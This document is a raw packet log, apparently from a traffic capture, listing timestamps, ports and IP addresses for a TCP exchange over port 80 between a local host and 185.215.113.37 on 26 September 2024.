Sep 26, 2024 22:40:16.701019049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701040030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701064110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701073885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701081038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701097012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701098919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701114893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701132059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701134920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701148033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701160908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701183081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701188087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701201916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701214075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701239109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701239109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701431036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701492071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701498032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701517105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701540947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701548100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701560020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701569080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701617956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701657057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701699018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701699018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701713085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701740026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701770067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701783895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701801062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701814890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701831102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.701832056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701852083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701870918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701900005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.701982975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702008963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702023029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702064037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702075005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702085018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702089071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702136993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702210903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702227116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702260017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702269077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702274084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702291012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702291965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702307940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702310085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702325106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702336073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702336073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702354908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702358007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702370882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702373028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702389002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702394962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702403069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702415943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702433109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702452898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702594042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702626944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702644110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702646971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702670097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702682018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702686071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702702045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702702999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702717066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702725887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702733994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702748060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702780008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702786922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702799082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702814102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702830076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702831030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702847004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702860117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.702883005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702883005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702883005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.702914000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.903531075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.903609991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.903670073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.903724909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963259935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963303089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963316917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963419914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963422060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963438034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963454008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963470936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963473082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963522911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963522911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963536024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963551998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963566065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963583946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963597059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963597059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963609934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963618040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963624954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963637114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963644981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963653088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963661909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963677883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963691950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963691950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963694096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963710070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963711023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963730097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963746071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963747978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963762999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963767052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963777065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963793039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963805914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963809967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963826895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963831902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963843107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963855982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963891983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963891983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963907003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963922977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963943958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963958025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963979006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963984013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.963998079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.963999987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964015007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964031935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964046955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964066029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964087009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964128971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964144945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964159966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964174032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964179993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964189053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964204073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964205980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964206934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964221001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964225054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964236021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964242935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964262009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964271069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964281082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964287996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964312077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964318991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964338064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964339972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964354038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964355946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964370012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964378119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964390993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964401960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964409113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964417934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964438915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964452982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964454889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964468956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964493036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964507103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964513063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964520931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964531898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964538097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964554071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964570045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964566946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964567900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964591980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964608908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964643002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964659929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964674950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964690924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964706898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964706898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964721918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964725018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964765072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964776039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964783907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964792013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964808941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964824915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964824915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964840889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964857101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964871883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964870930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964871883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964871883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964889050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964901924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964903116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964904070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964920998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.964926958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964946032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964979887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.964994907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.965042114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.965076923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.965091944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.965106010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.965126038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.965142965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.965151072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.965151072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.965158939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.965176105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.965190887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.965192080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.965208054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.965209007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.965224028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:16.965229034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.965248108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.965266943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:16.965285063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.012492895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.017558098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.238902092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.238934994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.238975048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.238984108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.238991022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239010096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239026070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239047050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239057064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239057064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239057064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239057064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239063025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239080906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239089012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239089012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239111900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239120960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239120960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239130974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239146948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239171982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239187002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239188910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239204884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239214897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239222050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239237070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239244938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239253998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239269018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239270926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239270926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239289999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239300013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239314079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239321947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239327908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239329100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239336014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239341021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239356041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239373922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239413977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239434958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239463091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239475965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239484072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239490986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239496946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239504099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239521027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239553928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239605904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239609003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239624977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239649057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239659071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239666939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239684105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239689112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239707947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239726067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239732027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239732027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239768982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239784956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239799976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239810944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239825964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239840031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239840031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239841938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239856958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239869118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239869118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239873886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239887953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239891052 CEST	80	49730	185.215.113.37	192.168.2.4
